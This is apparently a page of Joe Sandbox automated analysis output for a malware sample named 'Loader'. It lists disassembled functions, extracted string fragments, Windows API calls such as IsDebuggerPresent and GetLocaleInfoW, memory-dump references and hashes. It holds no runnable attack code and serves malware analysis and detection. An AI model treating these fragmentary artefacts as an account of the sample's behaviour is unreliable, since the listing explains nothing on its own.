Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: O*A$$[.]$'C$E$'G1Y$0_!Q$1K-M$D3C5$E{G}$F7UI$kW1i
API String ID: 0-1249160011
Opcode ID: 3778b98f0abbe60931399cc38bd04cb958d96acd4d00aa83d93d229c10c3937a
Instruction ID: 222227fdfcc7c64e292eacc97805ef3840d4bb5e2b9aa69d5b1b8cc7a9c3525d
Opcode Fuzzy Hash: 3778b98f0abbe60931399cc38bd04cb958d96acd4d00aa83d93d229c10c3937a
Instruction Fuzzy Hash: 5D3214B0900A51CBCB24CF25C89667BB7B1FF62324B58828CD8A64F795E374DA41CBD1

Function 001DFA3E Relevance: 10.3, Strings: 8, Instructions: 288COMMON

Download Yara Rule

Strings

/.M, xrefs: 001DFD5E
(), xrefs: 001DFBFB
u|, xrefs: 001DFA4E
Vn, xrefs: 001DFB78
Ym, xrefs: 001DFB70
ez, xrefs: 001DFA46
QW, xrefs: 001DFB68
g, xrefs: 001DFA56

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: ()$/.M$QW$Vn$Ym$ez$g$u|
API String ID: 0-1058671686
Opcode ID: e78aa084c4c321a80dc02e28b7b289c5d120aa9c27b98db2c08009eb66670112
Instruction ID: a1b70dbf634f0af26020918e103df08305b4a7e55cd2da0329fecd7b1e3c1e14
Opcode Fuzzy Hash: e78aa084c4c321a80dc02e28b7b289c5d120aa9c27b98db2c08009eb66670112
Instruction Fuzzy Hash: 44A1C17590C3419BD310CF24D89066BBBE1EFD6354F088A2DE8D99B341D7748A46CB93

Function 001AD7A5 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001AD989

Strings

1#IND, xrefs: 001AD8AA
1#QNAN, xrefs: 001AD8B8
1#SNAN, xrefs: 001AD8B1
1#INF, xrefs: 001AD8DB

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 7f2abfd2c4bb45a5ce379f0b944f2f1364583d971563adff48a5f0f597b7043a
Instruction ID: c12612581ff7e367cde48317f0c722068c2012dc7f7634b15cd96425d1e4b805
Opcode Fuzzy Hash: 7f2abfd2c4bb45a5ce379f0b944f2f1364583d971563adff48a5f0f597b7043a
Instruction Fuzzy Hash: 9CD23875E086288FDB65CE28DC407EAB7F5EB56305F1541EAD40EE7240EB78AE818F41

Function 001D99AE Relevance: 10.2, Strings: 8, Instructions: 158COMMON

Download Yara Rule

Strings

(, xrefs: 001D9B2A
(, xrefs: 001D99EF
%, xrefs: 001D99D7
+, xrefs: 001D99E7
*, xrefs: 001D99DF
+, xrefs: 001D9B22
*, xrefs: 001D9B1A
%, xrefs: 001D9B12

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %$%$($($*$*$+$+
API String ID: 0-157184678
Opcode ID: 771904273cf5686b33b2d4e4e1e52caa0c0aa27a5d3c936dc4ab86ff94e7f889
Instruction ID: b98fa98f1f5e6e70db2c4cb730d0c0ae6b4727dd1d88c036d09309d87479a016
Opcode Fuzzy Hash: 771904273cf5686b33b2d4e4e1e52caa0c0aa27a5d3c936dc4ab86ff94e7f889
Instruction Fuzzy Hash: AF612E7260D3D08FD328CE24D8D57ABBBD1AB92304F19886ED5CA9B392DB794944C743

Function 001D9C73 Relevance: 10.2, Strings: 8, Instructions: 157COMMON

Download Yara Rule

Strings

(, xrefs: 001D9CB5
+, xrefs: 001D9DE8
+, xrefs: 001D9CAD
%, xrefs: 001D9C9D
*, xrefs: 001D9CA5
%, xrefs: 001D9DD8
*, xrefs: 001D9DE0
(, xrefs: 001D9DF0

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %$%$($($*$*$+$+
API String ID: 0-157184678
Opcode ID: 05a44f2d6d0c77c2411bae58e55dbb80ceeda9b6f23e6e1f0fdaa153d9306c35
Instruction ID: 3ba41c581db6c30894550c567d5db4be7e2e80a3ab4d3d7637fa9ff0a0323509
Opcode Fuzzy Hash: 05a44f2d6d0c77c2411bae58e55dbb80ceeda9b6f23e6e1f0fdaa153d9306c35
Instruction Fuzzy Hash: 29515C7160C7D08FD329CF64D8E53ABBBD2AB92304F18886ED1CA87392DB794904C752

Function 001D8496 Relevance: 10.2, Strings: 8, Instructions: 156COMMON

Download Yara Rule

Strings

(, xrefs: 001D84CB
%, xrefs: 001D84B3
(, xrefs: 001D85FA
%, xrefs: 001D85E2
*, xrefs: 001D85EA
+, xrefs: 001D85F2
+, xrefs: 001D84C3
*, xrefs: 001D84BB

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %$%$($($*$*$+$+
API String ID: 0-157184678
Opcode ID: f55f467813c77472f1d33d89f98ab437b0b2d48317a4611e462e1f450e63769e
Instruction ID: 49c84bb5fe6114a75849f7a7fab794fd86f602c3c2644b14e746f83caaa25178
Opcode Fuzzy Hash: f55f467813c77472f1d33d89f98ab437b0b2d48317a4611e462e1f450e63769e
Instruction Fuzzy Hash: 1B51197154C3D08FD3298B34D8D53AB7BD1AB92314F19886ED5CA87392CF7A8441C746

Function 001DA496 Relevance: 10.2, Strings: 8, Instructions: 153COMMON

Download Yara Rule

Strings

(, xrefs: 001DA4C3
+, xrefs: 001DA5EA
%, xrefs: 001DA5DA
%, xrefs: 001DA4AB
*, xrefs: 001DA4B3
(, xrefs: 001DA5F2
*, xrefs: 001DA5E2
+, xrefs: 001DA4BB

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %$%$($($*$*$+$+
API String ID: 0-157184678
Opcode ID: b9fb67ced526085a6b7285c34aae30912587b43d3c2c61361ff119072fabdd2a
Instruction ID: 3393e8727a3aceb1813f9911903408c123a0d251321222d4eb3830703c37f5c4
Opcode Fuzzy Hash: b9fb67ced526085a6b7285c34aae30912587b43d3c2c61361ff119072fabdd2a
Instruction Fuzzy Hash: 9651297154C3D0CFD329CA24E8E63AA7BC1AF96304F5D886ED6CA97382D77984408743

Function 001E7490 Relevance: 9.2, Strings: 7, Instructions: 433COMMON

Download Yara Rule

Strings

\2, xrefs: 001E74BB
17, xrefs: 001E7D8E
W@, xrefs: 001E74B0
SQ, xrefs: 001E74A8
`q, xrefs: 001E77F8
89, xrefs: 001E7DA4
Tt, xrefs: 001E780E

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: 17$89$SQ$Tt$W@$\2$`q
API String ID: 0-3300596292
Opcode ID: 8205c9663b21b75bb0ca0f70064e668f51a9c16a3b16e9e41f07dcda829d3831
Instruction ID: 2add08f4997f586e387dd53a6c9d072a4c5a18dd506d08b69a327640e60aced7
Opcode Fuzzy Hash: 8205c9663b21b75bb0ca0f70064e668f51a9c16a3b16e9e41f07dcda829d3831
Instruction Fuzzy Hash: 8C42D8B45493858AE374CF129581BCFBBE1BB92744F208E1DC5E96B255DB70808ACF93

Function 001CFB6A Relevance: 9.1, Strings: 7, Instructions: 321COMMON

Download Yara Rule

Strings

H#Y!, xrefs: 001CFEC9
8, xrefs: 001CFC65
T]R#, xrefs: 001CFC4F
M/_-, xrefs: 001CFEBE
D'5%, xrefs: 001CFED4
o+X), xrefs: 001CFEB3
:;:9, xrefs: 001CFEDF

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: 8$:;:9$D'5%$H#Y!$M/_-$T]R#$o+X)
API String ID: 0-5659241
Opcode ID: 90b4f8fd5d928662df6ded95e7363ef684a84cfac523fa7db2b06661427fa4a8
Instruction ID: 7e2073b6275bd37098190e9230f59f2d11091007adab8c07d7c55c4a223bf4a7
Opcode Fuzzy Hash: 90b4f8fd5d928662df6ded95e7363ef684a84cfac523fa7db2b06661427fa4a8
Instruction Fuzzy Hash: 42B1CF7510C3C18AE735CF258454BEBBBE2EFA2304F1849ADD4D99B292D735850ACB93

Function 001ACAFF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,001ACE1D,00000002,00000000,?,?,?,001ACE1D,?,00000000), ref: 001ACB98
GetLocaleInfoW.KERNEL32(?,20001004,001ACE1D,00000002,00000000,?,?,?,001ACE1D,?,00000000), ref: 001ACBC1
GetACP.KERNEL32(?,?,001ACE1D,?,00000000), ref: 001ACBD6

Strings

OCP, xrefs: 001ACB53
ACP, xrefs: 001ACB1D

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 50fc947b0682e007ee568eddd24dfc9ed0bf82ef3d5b0da16e4fae2313d2360f
Instruction ID: ce9f0c1a18ffe047ce796ddd8f919acc9faff751f420c6b07d3a132a0cab4665
Opcode Fuzzy Hash: 50fc947b0682e007ee568eddd24dfc9ed0bf82ef3d5b0da16e4fae2313d2360f
Instruction Fuzzy Hash: 1321867A644104AADB359F58C903AA7B3A6AF56BA0B568464E90AE7101F733DE40C3F0

Function 00202C60 Relevance: 7.9, Strings: 6, Instructions: 384COMMON

Download Yara Rule

Strings

P, xrefs: 00202DEA
88&, xrefs: 00202F53
>8&, xrefs: 00203105
>8&, xrefs: 00202FA5
88&, xrefs: 002030AF
/.-,, xrefs: 00202FAC

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: /.-,$88&$88&$>8&$>8&$P
API String ID: 0-229866786
Opcode ID: 8ec3bc13e787c11419745f3ad0514da99d47f4cd6425247e71601e015963bd27
Instruction ID: 6a6d6816708f191522289ad3a40e9040731ceb0dd0defb1790f0f4e5af3f6ca2
Opcode Fuzzy Hash: 8ec3bc13e787c11419745f3ad0514da99d47f4cd6425247e71601e015963bd27
Instruction Fuzzy Hash: 5FC134329183628FD329CE18C89036FB6E1EBC5714F15863DE8A9AB3C2D7759D0987C1

Function 001ACCD4 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001ACDE0
IsValidCodePage.KERNEL32(00000000), ref: 001ACE29
IsValidLocale.KERNEL32(?,00000001), ref: 001ACE38
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001ACE80
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001ACE9F

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1f7703440d2d8baf435880d1b64074628792ab3a812af521f704b6dbc332a125
Instruction ID: 0035f00e3f13ea71b8f36073e71c013a83a0d137d69a834530de8848d3e61d73
Opcode Fuzzy Hash: 1f7703440d2d8baf435880d1b64074628792ab3a812af521f704b6dbc332a125
Instruction Fuzzy Hash: 4251A179A0060AABDB10EFA4CC41ABE7BB8BF56700F144439F514E7190EB709A44CBE1

Function 001AC370 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB

GetACP.KERNEL32(?,?,?,?,?,?,001A16A3,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001AC431
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001A16A3,?,?,?,00000055,?,-00000050,?,?), ref: 001AC45C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001AC5BF

Strings

utf8, xrefs: 001AC52E

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: bbebe72fbfb04b07f0333ab3ba8041359e1a77d8098785c2896eea13290b1dd9
Instruction ID: 774c7b534eff5476c6dd441eed0c661d88ad61613c4e8fd60923798f9d578477
Opcode Fuzzy Hash: bbebe72fbfb04b07f0333ab3ba8041359e1a77d8098785c2896eea13290b1dd9
Instruction Fuzzy Hash: 2B712779B00306AADB28AB39CC46FBA73A8EF6A750F144429F515D7181FB74ED4087E4

Function 001BF1F3 Relevance: 7.2, Strings: 5, Instructions: 974COMMON

Download Yara Rule

Strings

i, xrefs: 001C09CA
0, xrefs: 001C01F9
0, xrefs: 001C0468
0, xrefs: 001C01C1
@, xrefs: 001C0925

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: 0$0$0$@$i
API String ID: 0-3124195287
Opcode ID: a02d337b39e2843b5e0d4b20a7c4c744bb7c2108a04d61b6027daa769c6bfb40
Instruction ID: c8302ee23234e577e628d761ba6a22c1df80bc1d9cc7a5699909f430d6d14319
Opcode Fuzzy Hash: a02d337b39e2843b5e0d4b20a7c4c744bb7c2108a04d61b6027daa769c6bfb40
Instruction Fuzzy Hash: 1772B271A083518FD71ACF28C490B6ABBE1AFE9704F188A6DE4D997391D334DD45CB82

Function 00202360 Relevance: 6.6, Strings: 5, Instructions: 336COMMON

Download Yara Rule

Strings

88&, xrefs: 00202464
/.-,, xrefs: 00202588
/.-,, xrefs: 002023DC
88&, xrefs: 00202529
88&, xrefs: 00202389

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: /.-,$/.-,$88&$88&$88&
API String ID: 0-3163543823
Opcode ID: 9de5f1835d50790a1f05f7458c331f9ecbbd1b59609f1199f386c239a140f18a
Instruction ID: 8e626f32b9457bce9a3d2c1d70fabe9a45b457dc0d73090e48e510a15374fba2
Opcode Fuzzy Hash: 9de5f1835d50790a1f05f7458c331f9ecbbd1b59609f1199f386c239a140f18a
Instruction Fuzzy Hash: 74A13732A28351DBE728CF14CC81BABB6D5EBC4704F54882DE988D72D3E63498548B92

Function 001A3F53 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 001A3FE0

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 17a8af3533a897e6e906cec53c923a3a22616cf0740b16545c45100316cc9468
Instruction ID: fc989dbeaa2db11030625bcaae41e600c31fac45933931283d4d715c98ff70b9
Opcode Fuzzy Hash: 17a8af3533a897e6e906cec53c923a3a22616cf0740b16545c45100316cc9468
Instruction Fuzzy Hash: 58B17A3AD002459FDF15CF68C8917FEBBA5EFA6340F15816AF904AB241D3B49D41CBA0

Function 00197508 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00197514
IsDebuggerPresent.KERNEL32 ref: 001975E0
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001975F9
UnhandledExceptionFilter.KERNEL32(?), ref: 00197603

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: b39f09892c5069a8793f1adb4f26c6018a0cec7686a14d937c508cabda776516
Instruction ID: 4001f41ba79e16392188d69e1115cfaa8756efc0bcb31323cfa97f730da242d5
Opcode Fuzzy Hash: b39f09892c5069a8793f1adb4f26c6018a0cec7686a14d937c508cabda776516
Instruction Fuzzy Hash: FF31F775D152199BDF20EFA4D9897CDBBB8BF18300F1041AAE40DAB290EB719B848F45

Function 001EF5CE Relevance: 5.8, Strings: 4, Instructions: 824COMMON

Download Yara Rule

Strings

aff{, xrefs: 001EFBE4
]), xrefs: 001EFF31
>T\Z, xrefs: 001EFF27
*XJ{, xrefs: 001EFC98

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
